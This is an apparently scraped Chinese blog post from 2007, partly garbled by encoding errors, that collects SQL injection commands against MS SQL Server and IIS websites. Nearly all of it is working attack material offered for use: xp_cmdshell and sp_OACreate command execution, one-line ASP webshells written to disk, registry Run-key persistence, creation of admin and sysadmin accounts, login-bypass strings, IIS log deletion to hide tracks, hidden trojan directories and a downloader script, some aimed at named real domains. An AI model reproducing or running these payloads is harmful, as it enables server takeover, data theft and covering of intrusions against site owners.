??xml version="1.0" encoding="utf-8" standalone="yes"?>WWW婷婷AV久久久影片,国内精品九九久久精品,国产福利电影一区二区三区久久老子无码午夜伦不 http://www.shnenglu.com/elva/category/4146.htmlzh-cnWed, 21 May 2008 07:47:35 GMTWed, 21 May 2008 07:47:35 GMT60最详细的SQL注入相关的命令整?http://www.shnenglu.com/elva/archive/2007/10/22/34820.html叶子叶子Mon, 22 Oct 2007 01:41:00 GMThttp://www.shnenglu.com/elva/archive/2007/10/22/34820.htmlhttp://www.shnenglu.com/elva/comments/34820.htmlhttp://www.shnenglu.com/elva/archive/2007/10/22/34820.html#Feedback0http://www.shnenglu.com/elva/comments/commentRss/34820.htmlhttp://www.shnenglu.com/elva/services/trackbacks/34820.htmlQUOTE:
1?  用^转义字符来写ASP(一句话木马)文g的方?
?   http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("l"^)^</script^> >c:\mu.asp';--

?   echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp

2?  昄SQLpȝ版本Q?
?   http://192.168.1.5/display.asp?keyno=188 and 1=(select @@VERSION)
?   http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@version)--

Microsoft VBScript ~译器错?错误 '800a03f6'
~少 'End'
/iisHelp/common/500-100.aspQ行242
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/display.aspQ行17
3?  在检烦(ch)g国的|站漏洞Ӟ分明已经定?jin)漏z存在却无法在这三种漏洞中找到对应的cd。偶焉我想C(jin)在SQL语言中可以?#8220;in”关键字进行查询,例如“select * from mytable where id in(1)”Q括号中的值就是我们提交的数据Q它的结果与使用“select * from mytable where id=1”的查询结果完全相同。所以访问页面的时候在URL后面加上“) and 1=1 and 1 in(1”后原来的SQL语句变成了(jin)“select * from mytable where id in(1) and 1=1 and 1 in(1)”Q这样就?x)出现期待已久的面了(jin)。暂且就叫这U类型的漏洞?#8220;包含数字?#8221;吧,聪明的你一定想C(jin)q有“包含字符?#8221;呢。对?jin),它就是由于类?#8220;select * from mytable where name in(‘firstsee’)”的查询语句造成的?br>
4?  判断xp_cmdshell扩展存储q程是否存在Q?br>http://192.168.1.5/display.asp?keyno=188 and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name = 'xp_cmdshell')
恢复xp_cmdshell扩展存储的命令:(x)
http://www.test.com/news/show1.asp?NewsId=125272
;exec master.dbo.sp_addextendedproc 'xp_cmdshell',’e:\inetput\web\xplog70.dll’;--

5?  向启动组中写入命令行和执行程序:(x)
http://192.168.1.5/display.asp?keyno=188;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'


6?  查看当前的数据库名称Q?br>?   http://192.168.1.5/display.asp?keyno=188 and 0<>db_name(n) nҎ(gu)0,1,2,3……可以跨库了(jin)
?   http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,db_name())--
Microsoft VBScript ~译器错?错误 '800a03f6'
~少 'End'
/iisHelp/common/500-100.aspQ行242
Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'huidahouse' to a column of data type int.
/display.aspQ行17
7?  列出当前所有的数据库名Uͼ(x)
select * from master.dbo.sysdatabases   列出所有列的记?br>select name from master.dbo.sysdatabases 仅列出name列的记录

8?  不需xp_cmdshell支持在有注入漏洞的SQL服务器上q行CMD命o(h)Q?br>CREATE TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:\>c:\temp.txt','0','true'
--注意run的参数true指的是将{待E序q行的结果,对于cMping的长旉命o(h)必需使用此参数?br>
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
--因ؓ(f)fso的opentextfileҎ(gu)返回一个textstream对象Q所以此时@file是一个对象o(h)?br>
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
INSERT INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END

DROP TABLE MYTMP

----------
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true'
EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt'
WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
INSERT INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END

以下是一行里面将WEB用户加到理员组中:(x)
DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll">c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

以下是一行中执行EXEE序Q?br>DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c cscript.exe E:\bjeea.net.cn\score\fts\images\iis.vbs lh1 c:\>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

SQL下三U执行CMD命o(h)的方法:(x)

先删?.18h志:(x)
(1)exec master.dbo.xp_cmdshell 'del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt'

(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c del C:\winnt\system32\logfiles\W3SVC5\ex050718.log >c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

Q?Q首先开启jet沙盘模式Q通过扩展存储q程xp_regwrite修改注册表实玎ͼ理员(sh)Ҏ(gu)册表不能预防的原因。出于安全原因,默认沙盘模式未开启,q就是ؓ(f)什么需要xp_regwrite的原因,而xp_regwrite臛_需要DB_OWNER权限Qؓ(f)?jin)方便,q里使用sysadmin权限试Q?br>?   exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
注:(x)
0   止一切(默认Q?br>1   使能讉KACCESSQ但是禁止其?br>2   止讉KACCESSQ但是能其?br>3   使能一?br>
?   q里仅给出sysadmin权限下用的命o(h)Q?br>select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')


?   建立链接数据?L0op8ack'参考命令:(x)
EXEC sp_addlinkedserver 'L0op8ack','OLE DB Provider for Jet','Microsoft.Jet.OLEDB.4.0','c:\windows\system32\ias\ias.mdb'

?   如何使用链接数据库:(x)

使用q个方式可以执行Q但是很不幸QDB_OWNER权限是不够的Q需要至sysadmin权限或者securityadmin+setupadmin权限l合
sp_addlinkedserver需要sysadmin或setupadmin权限
sp_addlinkedsrvlogin需要sysadmin或securityadmin权限
最l发玎ͼq是sa权限或者setupadmin+securityadmin权限帐户才能使用Q?br>一般没有哪个管理员q么讄普通帐h限的

实用性不强,仅作Z个学?fn)ȝ?br>
大致q程如下Q如果不是sysadminQ那么IAS.mdb权限验证?x)出错?br>我测试的时候授予hackerq个用户setupadmin+securityadmin权限Q用ias.mdbp|
需要找一个一般用户可讉K的mdb才可以:(x)

?   新徏链接服务?#8221;L0op8ack”:EXEC sp_addlinkedserver 'L0op8ack','JetOLEDB','Microsoft.Jet.OLEDB.4.0','c:\winnt\system32\ias\ias.mdb';--
?   exec sp_addlinkedsrvlogin 'L0op8ack','false';--?br>exec sp_addlinkedsrvlogin 'L0op8ack', 'false', NULL, 'test1', 'ptlove';--
?   SELECT * FROM OPENQUERY(L0op8ack, 'SELECT shell("cmd.exe /c net user")');--
?   exec sp_droplinkedsrvlogin 'L0op8ack','false';--
?   exec sp_dropserver 'L0op8ack';--

再考贝一个其它文件来代替7.18日文Ӟ(x)
(1)exec master.dbo.xp_cmdshell 'copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt'

(2)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c copy C:\winnt\system32\logfiles\W3SVC5\ex050716.log C:\winnt\system32\logfiles\W3SVC5\ex050718.log>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

(3)DECLARE @shell INT DECLARE @fso INT DECLARE @file INT DECLARE @isEnd BIT DECLARE @out VARCHAR(400) EXEC sp_oacreate 'wscript.shell',@shell output EXEC sp_oamethod @shell,'run',null,'cmd.exe /c net user>c:\temp.txt','0','true' EXEC sp_oacreate 'scripting.filesystemobject',@fso output EXEC sp_oamethod @fso,'opentextfile',@file out,'c:\temp.txt' WHILE @shell>0 BEGIN EXEC sp_oamethod @file,'Readline',@out out INSERT INTO MYTMP(info) VALUES (@out) EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out IF @isEnd=1 BREAK ELSE CONTINUE END

9?  用UPDATE来更新表中的数据Q?br>HTTP://xxx.xxx.xxx/abc.asp?p=YY;update upload.dbo.admin set pwd='a0b923820dcc509a' where username='www';--
www用户密码?6位MD5gؓ(f)Qa0b923820dcc509aQ即把密码改?Q?br>32位MD5gؓ(f)Q?  Q密码ؓ(f)

10?  利用表内容导成文件功?br>SQL有BCP命o(h)Q它可以把表的内容导成文本文件ƈ攑ֈ指定位置。利用这功能,我们可以先徏一张(f)时表Q然后在表中一行一行地输入一个ASP木马Q然后用BCP命o(h)导出形成ASP文g?br>命o(h)行格式如下:(x)
bcp "select * from temp " queryout c:\inetpub\wwwroot\runcommand.asp –c –S localhost –U sa –P upload('S'参数为执行查询的服务器,'U'参数为用户名Q?P'参数为密码,最l上传了(jin)一个runcommand.asp的木??br>
11、创、播入数据和d数据的方?br>?   创徏表:(x)
' and 1=1 union select 1,2,3,4;create table [dbo].[cyfd]([gyfd][char](255))--
?   往表里播入数据Q?br>' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) select top 1 name from upload.dbo.sysobjects where xtype='U' and status>0,@result output insert into cyfd (gyfd) values(@result);--
' and 1=1 union select 1,2,3,4;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
?   从表里读取数据:(x)
' and 1=(select count(*) from cyfd where gyfd >1)--

?   删除临时表:(x)
';drop table cyfd;--

12、通过SQL语句直接更改sa的密码:(x)
?   update master.dbo.sysxlogins set password=0x0100AB01431E944AA50CBB30267F53B9451B7189CA67AF19A1FC944AA50CBB30267F53B9451B7189CA67AF19A1FC where sid=0x01,q样sa的密码就被我们改成了(jin)111111拉。呵呵,解决的方法就是把sal删拉。,怎么删可以参考我的《完全删除saq个后门》?br>
?   查看本机所有的数据库用户名Q?br>select * from master.dbo.sysxlogins
select name,sid,password ,dbid from master.dbo.sysxlogins

?   更改sa口o(h)Ҏ(gu)Q用sqll合利用工具q接后,执行命o(h)Q?br>exec sp_password NULL,'新密?,'sa'

13、查询dvbbs库中所有的表名和表l构Q?br>?   select * from dvbbs.dbo.sysobjects where xtype='U' and status>0
?   select * from dvbbs.dbo.syscolumns where id=1426104121

14、手工备份当前数据库Q?br>完全备䆾Q?br>;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH formAT--
差异备䆾Q?br>;declare @a sysname,@s nvarchar(4000)
select @a=db_name(),@s='c:/db1' backup database @a to disk=@s WITH DIFFERENTIAL,formAT?br>
15、添加和删除一个SA权限的用户testQ?br>exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin

cmd.exe /c isql -E /U alma /P /i K:\test.qry

16、select * from ChouYFD.dbo.sysobjects where xtype='U' and status>0
可以列出库ChouYFD中所有的用户建立的表名?br>Select name,id from ChouYFD.dbo.sysobjects where xtype='U' and status>0

17?br>?   http://www.npc.gov.cn/zgrdw/common/image_view.jsp?sqlstr=select * from rdweb.dbo.syscolumns Qwhere id=1234Q?br>列出rdweb库中所有表中的字段名称
?   select * from dvbbs.dbo.syscolumns where id=5575058
列出库dvbbs中表id=5575058的所有字D名

18、删除记录命令:(x)delete from Dv_topic where boardid=5 and topicid=7978

19、绕q登录验证进入后台的Ҏ(gu)整理Q?br>1) ' or''='
2) ' or 1=1--
3) ‘ or ‘a’=’a--
4) ‘or’=’or’
5) " or 1=1--
6Qor 1=1--
7Q?or ’a=’a
8Q? or "a"="a
9Q?’) or (’a’=’a
10Q?") or ("a"="a
11Q?Q?or (1=1
12) 'or''='
13) 人气%’ and 1=1 and ’%’=’

20、寻扄站\径的Ҏ(gu)汇总:(x)
1Q查看WEB|站安装目录命o(h)Q?br>?   cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root >c:\test1.txt Q将2换成1???试试Q?br>type c:\test1.txt
del c:\test1.txt
在NBSI下可以直接显C行结果,所以不用导出到文g

2Q在|站上随便找C个图片的名字 123.jpg
然后写进批处理程?23.bat:
d:
dir 123.jpg /s >c:\123.txt
e:
dir 123.jpg /s >>c:\123.txt
f:
dir 123.jpg /s >>c:\123.txt

执行?type c:\123.txt
q样来分析网站的路径

3QSQL服务器和|站服务器在同一个服务器上,好了(jin)是可以执行命令是吧?
执行命令输出结果到
%windir%\help\iishelp\common\404b.htm或?00.asp
注意输出前Backupq两个文?br>如:(x)
dir c:\ >%windir%\help\iishelp\common\404b.htm
然后随便输入一个文件来讉KQhttp://目标ip/2.asp

4Q针对win2000pȝQxp_regreaddHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots 获取WEB路径
2003pȝQxp_regreaddQ未扑ֈҎ(gu)
如:(x)
Q?Q?  新徏一个表cyfd(字段为gyfd)Q?a target=_blank>http://www.cnwill.com/NewsShow.aspx?id=4844;create table [dbo].[cyfd]([gyfd][char](255))--
Q?Q?  把web路径写进?http://www.cnwill.com/NewsShow.aspx?id=4844;DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into cyfd (gyfd) values(@result);--
Q?Q?  q是让他不匹配,昄错误:http://www.cnwill.com/NewsShow.aspx?id=4844 and 1=(select count(*) from cyfd where gyfd >1)
Source: .Net SqlClient Data Provider
Description: ?varchar ?'Y:\Web\烟台人才热线后台理pȝ,,201 ' 转换为数据类型ؓ(f) int 的列时发生语法错误?br>TargeSite: Boolean Read() 哈哈哈。。\径暴露了(jin)。?br>Q?Q接下来删除?http://www.cnwill.com/NewsShow.aspx?id=4844;drop table cyfd;--

5Q用regedit命o(h)导出注册表,导出的l果保存的\径到%windir%\help\iishelp\common\404b.htm或?00.asp面
regedit命o(h)说明Q?br>Regedit /L:system /R:user /E filename.reg Regpath
参数含义Q?br>/LQsystem指定System.dat文g所在的路径?br>/RQuser指定User.dat文g所在的路径?br>/EQ此参数指定注册表编辑器要进行导出注册表操作Q在此参数后面空一|输入导出注册表的文g名?br>RegpathQ用来指定要导出哪个注册表的分支Q如果不指定Q则导出全部注册表分支。在q些参数中,"/LQsystem"?/RQuser"参数是可选项Q如果不使用q两个参敎ͼ注册表编辑器则认为是?a class=wordstyle target=_blank>WINDOWS目录下的"system.dat"?user.dat"文gq行操作。如果是通过从Y盘启动ƈq入DOSQ那么就必须使用"/L"?/R"参数来指?system.dat"?user.dat"文g的具体\径,否则注册表编辑器无法找到它们。比如说Q如果通过启动盘进入DOSQ则备䆾注册表的命o(h)?Regedit /L:C:\windows\/R:C:\windows\/e regedit.reg",该命令的意思是把整个注册表备䆾?a class=wordstyle target=_blank>WINDOWS目录下,其文件名?regedit.reg"。而如果输入的?regedit /E D:\regedit.reg"q条命o(h)Q则是说把整个注册表备䆾到D盘的根目录下Q省略了(jin)"/L"?/R"参数Q,其文件名?Regedit.reg"?br>
regedit /s c:\adam.reg Q导入c:\adam.reg文gx(chng)册表Q?br>regedit /e c:\web.reg Q备份全部注册内容到c:\web.reg中)(j)
针对win2000pȝQC:\>regedit /e %windir%\help\iishelp\common\404b.htm "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots"
然后http://目标IP/2.asp
针对win2003pȝQ没有找刎ͼ希望扑ֈ的朋友公布出来一赯论?br>
6Q虚拟主Z%SystemRoot%\system32\inetsrv\MetaBack\下的文g是iis的备份文Ӟ是允许web用户讉K的,如果你的iis备䆾到这里,用webshell下蝲下来后用C本打开Q可以获取对应的域名和webl对路径?br>
7QSQL注入建立虚拟目录Q有dbo权限下找不到webl对路径的一U解军_法:(x)
我们很多情况下都遇到SQL注入可以列目录和q行命o(h)Q但是却很不Ҏ(gu)扑ֈweb所在目录,也就不好得到一个webshellQ这一招不错:(x)
?   建立虚拟目录win,指向c:\winnt\system32Qexec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\winnt\system32"'
?   让win目录h解析asp脚本权限Qexec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/win/Accessexecute "true" –s:'
?   删除虚拟目录winQexec master.dbo.xp_cmdshell 'cscript C:\inetpub\AdminScripts\adsutil.vbs delete w3svc/1/root/win/'
?   试Q?a target=_blank>http://127.0.0.1/win/test.asp
8Q利用SQL语句来查找W(wng)EB目录Q根据经验,猜疑WEB根目录的序是:(x)d盘、e盘、c盘,首先我们建立一个(f)时表用于存放master..xp_dirtree(适合于public)生成的目录树(wi),用以下语句:(x)
;create table temp(dir nvarchar(255),depth varchar(255));--,该表的dir字段表示目录的名Uͼdepth字段表示目录的深度。然后执行xp_dirtree获得D盘的目录?wi),语句如下Q?
;insert temp(dir,depth) exec master.dbo.xp_dirtree 'd:';--

在进行下面的操作前,先查看D盘有几个文g夹,q样对D盘有个大致的?jin)解Q语句如下:(x)
and (select count(*) from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM ?))>=数字(数字=0???...)

接着Q我们在Ҏ(gu)的网站上扑և个一U子目录Q如user、photoQ然后,用筛选的Ҏ(gu)来判断WEB根目录上是否存在此盘?sh),语句如下Q?
and (select count(*) from temp where dir<>'user')<(select count(*) from temp)

看语句的q回l果Q如果ؓ(f)真,表示WEB根目录有可能在此盘(sh)Qؓ(f)?jin)进一步确认,多测试几个子目录Q?
and (select count(*) from temp where dir<>'photo')<(select count(*) from temp)

...

如果所有的试l果都ؓ(f)真,表示WEB根目录很有可能在此盘?sh)?

下面假设扑ֈ的WEB根目录在此盘?sh),用以下的语句来获得一U子目录的深度:(x)
and (select depth from temp where dir='user')>=数字(数字=1??...)

假设得到的depth?,说明user目录是D盘的3U目录,则WEB根目录是D盘的二目录?

目前我们已经知道?jin)根目录所在的盘符和深度,要找到根目录的具体位|,我们来从D盘根目录开始逐一搜寻Q当?dng)没有必要知道每个目录的名Uͼ否则太耗费旉?jin)?

接下来,另外建立一个(f)时表Q用来存放D盘的1U子目录下的所有目录,语句如下Q?

;create table temp1(dir nvarchar(255),depth varchar(255));--

然后把从D盘的W一个子目录下的所有目录存到temp1中,语句如下Q?
declare @dirname varchar(255);set @dirname='d:\'+(select top 1 dir from (select top 1 dir from temp where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM ?) order by dir desc)T order by dir);insert into temp1 exec master.dbo.xp_dirtree @dirname
当然也可以把D盘的W二个子目录下的所有目录存到temp1中,只需把第二个top 1改ؓ(f)top 2p?jin)?

现在Qtemp1中已l保存(sh)(jin)所有D盘第一U子目录下的所有目?然后Q我们用同样的方法来判断根目录是否在此一U子目录下:(x)
and (select count(*) from temp1 where dir<>'user')<(select count(*) from temp1)
如果q回为真Q表C根目录可能在此子目录下Q记住要多测试几个例子,如果都返回ؓ(f)假,则表明WEB根目录不在此目录下,然后我们在用同样的方法来获得D盘第2?...个子目录下的所有目录列表,来判断WEB根目录是否在其下。但是,要注意,用xp_dirtree前一定要把temp1表中的内容删除?

现在假设QW(xu)EB根目录在D盘的W一U子目录下,该子目录名称为website,怎样获得q个目录的名U我想不用我说了(jin)吧。因为前面我们知道了(jin)WEB根目录的深度?Q我们需要知道website下到底哪个才是真正的WEB根目录?

现在Q我们用同样的方法,再徏立第3个(f)时表Q?
;create table temp2(dir nvarchar(255),depth varchar(255));--

然后把从D盘的website下的所有目录存到temp2中,语句如下Q?
declare @dirname varchar(255);set @dirname='d:\website\'+(select top 1 dir from (select top 1 dir from temp1 where depth=1 and dir not in('Documents and Settings','Program Files','RECYCLER','System Volume Information','WINDOWS','CAConfig','wmpub','Microsoft UAM ?) order by dir desc)T order by dir);insert into temp2 exec master.dbo.xp_dirtree @dirname
当然也可以把D盘的website下第二个子目录下的所有目录存到temp2中,只需把第二个top 1改ؓ(f)top 2p?jin)?

现在Q我们用同样的方法判断该目录是否为根目录Q?
and (select count(*) from temp2 where dir<>'user')<(select count(*) from temp2)
如果q回为真Qؓ(f)?jin)确定我们的判断Q多试几个例子Q方法上面都讲到?jin),如果多个例子都返回?f)真,那么q定了(jin)该目录ؓ(f)WEB根目录?


用以上的Ҏ(gu)基本上可以获得WEB根目录,现在我们假设W(wng)EB根目录是QD:\website\www
然后Q我们就可以备䆾当前数据库到q个目录下用来下载。备份前我们把temp、temp1、temp2的内Ҏ(gu)I,然后C、D、E盘的目录?wi)分别存到temp、temp1、temp2中?

下蝲完数据库后要记得把三个(f)时表DROP掉,现在我们在下载的数据库中可以扑ֈ所有的目录列表Q包括后台管理的目录以及(qing)更多信息?br>
21、win2000下将WEB用户提升为系l用h限,需要有理员的权限才能执行Q?br>c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll"

cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\windows\system32\idq.dll" "C:\windows\system32\inetsrv\httpext.dll" "C:\windows\system32\inetsrv\httpodbc.dll" "C:\windows\system32\inetsrv\ssinc.dll" "C:\windows\system32\msw3prt.dll" "C:\windows\system32\inetsrv\asp.dll"

查看是否成功Q?br>c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps

Microsoft (R) Windows Script Host Version 5.6
版权所?C) Microsoft Corporation 1996-2001。保留所有权利?br>inprocessisapiapps       : (LIST) (6 Items)
"C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll"
"C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\system32\msw3prt.dll"
"c:\winnt\system32\inetsrv\asp.dll"

22、如何隐藏ASP木马Q?br>建立非标准目录:(x)mkdir images..\
拯ASP木马至目录:(x)copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
通过web讉KASP木马Q?a href="http://ip/images../news.asp?action=login" target=_blank>http://ip/images../news.asp?action=login
如何删除非标准目录:(x)rmdir images..\ /s

23、去掉tenlnet的ntlm认证Q?br>;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'?br>
24、用echo写入文g下蝲脚本iget.vbs:
(1)echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >c:\iget.vbs

(2)c:\>cscript iget.vbs http://127.0.0.1/asp/dbm6.asp dbm6.asp


25、手工徏立IIS隐藏目录的方法:(x)
?   查看本地虚拟目录列表Qcscript.exe c:\inetpub\AdminScripts\adsutil.vbs enum w3svc/1/root
?   新徏一个kiss目录Qmkdir c:\asp\kiss
?   建立kiss虚拟目录Qcscript.exe c:\inetpub\AdminScripts\mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "kiss","c:\asp\kiss"  
?   为kiss目录加执行和写权限:(x)
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/kiss/accesswrite "true" -s:
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/accessexecute "true" -s:
?   ?:Cscript c:\inetpub\AdminScripts\adsutil.vbs set /w3svc/1/root/kiss/createprocessasuser false
?   讉KQ?a target=_blank>http://127.0.0.1/kiss/test.asp

26、用openrowset()q回本地做测试:(x)
SELECT a.*
FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'SELECT * FROM [dvbbs].[dbo].[dv_admin]') AS a

SELECT * FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'SELECT * FROM [dvbbs].[dbo].[dv_admin]')

27、获得主机名Q?br>http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@servername)--
select convert(int,@@servername)
select @@servername

28、获得数据库用户名:(x)
http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,system_user)--
http://www.19cn.com/showdetail.asp?id=49 and user>0
select user

29、普通用戯得WEBSHELL的方法之二:(x)
?   打包Q?br>EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp'
解包Q可以用于得到webshellQ?br>?   EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp'
?   MQ意文件内容,要求有master的dbo权限Q?br>EXEC [master].[dbo].[xp_readerrorlog] 1,'c:\cmd.asp'

30、sa 权限下已知web路径直接备䆾数据库到web路径?br>
http://www.XXXX.com/FullStory.asp?id=1;backuup database 数据库名 to disk='c:\inetpub\wwwroot\save.db' 则把得到的数据内容全部备份到WEB目录下,再用HTTP把此文g下蝲(当然首选要知道WEB虚拟目录)?br>
?   遍历pȝ的目录结构,分析l果q发现WEB虚拟目录Q先创徏一个(f)时表Qtemp
